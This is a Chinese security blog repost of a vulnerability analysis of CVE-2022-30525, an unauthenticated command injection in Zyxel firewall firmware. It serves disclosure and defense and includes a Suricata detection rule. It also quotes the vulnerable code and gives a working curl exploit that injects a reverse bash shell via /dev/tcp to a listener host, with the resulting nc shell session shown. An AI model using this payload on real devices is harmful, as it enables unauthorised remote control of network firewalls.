【高】合勤 - 远程命令执行

2022年5月15日01:25:31评论55 views字数 4243阅读14分8秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

漏洞描述

2022 年 4 月 28 日，合勤发布了修复 CVE-2022-30525 的固件。Rapid7 发现的该漏洞是一个未经身份验证的远程命令注入漏洞，影响一些 Zyxel 防火墙的管理 Web 界面。利用此漏洞的攻击者可以将远程命令执行为nobody. 该漏洞评分为 CVSSv3 9.8。

Zyxel USG FLEX 100(W) 固件版本 5.00 至 5.21 补丁 1、USG FLEX 200 固件版本 5.00 至 5.21 补丁 1、USG FLEX 500 固件版本 5.00 至 5.21 补丁 1、USG FLEX 700 的 CGI 程序中的操作系统命令注入漏洞固件版本 5.00 到 5.21 补丁 1，USG FLEX 50(W) 固件版本 5.10 到 5.21 补丁 1，USG20(W)-VPN 固件版本 5.10 到 5.21 补丁 1，ATP 系列固件版本 5.10 到 5.21 补丁 1，VPN 系列固件版本4.60 到 5.21 补丁 1，这可能允许攻击者修改特定文件，然后在易受攻击的设备上执行一些操作系统命令。

漏洞状态

细节

有

POC

未知

EXP

未知

等级

高

野外

有

类型

Rce

漏洞引用

旧的漏洞

影响版本

USG FLEX 100(W) 固件
USG FLEX 200 固件
USG FLEX 500 固件
USG FLEX 700 固件
ATP系列固件
VPN系列固件
USG FLEX 50(W) 固件
USG 20(W)-VPN 固件

漏洞分析

该漏洞源于使用os.system攻击者提供的数据。攻击是通过/ztp/cgi-bin/handler端点发起的。handler是一个处理各种命令的 Python 脚本。我们使用固件版本 5.21 的测试Zyxel USG FLEX 100使用handler.py带有以下支持的命令（如中所写handler.py）：

supported_cmd = ["ping", "dnsanswer", "ps", "peek", "kill", "pcap", "traceroute",   "atraceroute", "iptables", "getorchstat",   "getInterfaceName_out", "getInterfaceInfo",   #"getSingleInterfaceInfo", "getAllInterfaceInfo",   #"getInterfaceNameAll", "getInterfaceNameMapping",   "nslookup", "iproget",   "diagnosticinfo", "networkUnitedTest",   #"setRemoteAssistActive", "getRemoteAssist",   "setRemoteZyxelSupport", "getRemoteZyxelSupport",   "getWanPortList", "getWanPortSt", "setWanPortSt", "getZTPurl", "getWanConnSt",   "getUSBSt","setUSBmount","setUSBactive",   "getDiagnosticInfoUsb",   "getDeviceCloudInfo", "getpacketcapconf", "getpacketcapst", "packetcapstart", "packetcapend", "packetcapremovefile",   "getlanguagest","setlanguage"]

这些命令通过设计为未经身份验证的用户提供了各种有趣的选项。易受 CVE-2022-30525 攻击的命令是getWanPortSt.

elif req["command"] == "getWanPortSt":    reply = lib_wan_setting.getWanPortSt()

上面，我们可以看到getWanPortSt调用了lib_wan_setting.getWanPortSt. 这是在lib_wan_setting.py.

'''**************************************************************************** setwanport function* @param port: port for setting* @param vlanid: vlan id , 0 for default disalbing vlan* @param proto: type of wan (dhcp, static, pppoe)* @param data: detail setting for different port type** @return reply{*               "code": <exception error code>,*               "message": <exception>,*               "result": {'ZTPurl':"xx"}*          }***************************************************************************'''def setWanPortSt(req):
    reply = {}    vlan_tagged = ''    logging.info(req)    port = req["port"].strip()
    vlanid = req["vlanid"]    proto = req["proto"]    data = req["data"]    vlan_tagged = req["vlan_tagged"]…

该getWanPortSt命令需要四个参数：vlanid、proto、data和vlan_tagged。此外，它接受一个mtu参数。两者都data可以mtu被利用来进行命令注入。data实际上包含一个额外的 JSON blob，因此更容易利用mtu.

最终，经过一定程度的验证，所有提供的参数都组合成一个命令并执行。

    cmdLine += extname + ' ' + port.lower() + ' ' + data['username'] + ' ' + data['password']         + ' ' + data['auth_type']         + ' ' + data['ipaddr'] + ' ' + data['gateway']         + ' ' + data['firstDnsServer'] + ' ' + req['mtu']    if vlan_tagged == '1':        cmdLine += ' ' + vlanid    cmdLine += ' >/dev/null 2>&1'    logging.info("cmdLine = %s" % cmdLine)with open("/tmp/local_gui_write_flag", "w") as fout:    fout.write("1");
response = os.system(cmdLine) logging.info(response)

curl使用如下所示的概念验证反向 bash shell 。请注意，该命令被插入到该mtu字段中。

curl -v --insecure -X POST -H "Content-Type: application/json" -d '{"command":"setWanPortSt","proto":"dhcp","port":"1270","vlan_tagged":"1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/10.0.0.2/1270 <&1;";","data":"hi"}' https://10.0.0.14/ztp/cgi-bin/handler

在攻击者机器上，这可以使用nc：

albinolobster@ubuntu:~$ nc -lvnp 1270Listening on 0.0.0.0 1270Connection received on 10.0.0.14 41498bash: cannot set terminal process group (10800): Inappropriate ioctl for devicebash: no job control in this shellbash-5.1$ id     iduid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)bash-5.1$ ps fauxps faux

从 shell 中，我们可以从以下角度观察攻击的外观ps faux：

nobody   13184  0.0  0.2  20952  5072 ?        S    May09   0:00  _ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSLnobody     640  9.3  0.6  18104 11224 ?        S    08:58   0:02  |   _ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.pynobody     641  0.0  0.0   3568  1508 ?        S    08:58   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN1269 1270 ; bash -c "exec bash -i &>/dev/tcp/10.0.0.2/1270 <&1;"; 5 >/dev/null 2>&1nobody     643  0.0  0.0   3716  1760 ?        S    08:58   0:00  |           _ bash -i

妥协指标

不幸的是，防火墙的日志记录并没有提供任何有用的洞察力。受影响的防火墙确实支持诊断功能，但在生产环境中运行并不明智。如果可能，我们建议监控系统入口和出口是否存在异常行为。以下 Suricata 规则应有助于在该mtu字段用于漏洞利用时识别漏洞利用：

alert http any any -> any any (     msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt";     flow:to_server;     http.method; content:"POST";     http.uri; content:"/ztp/cgi-bin/handler";     http.request_body; content:"setWanPortSt";     http.request_body; content:"mtu";     http.request_body; pcre:"/mtu["']s*:s*["']s*[^0-9]+/i";    classtype:misc-attack;     sid:221270;)

【高】合勤 - 远程命令执行

原文始发于微信公众号（Ots安全）：【高】合勤 - 远程命令执行

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【高】合勤 - 远程命令执行

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

发表评论

在线咨询

微信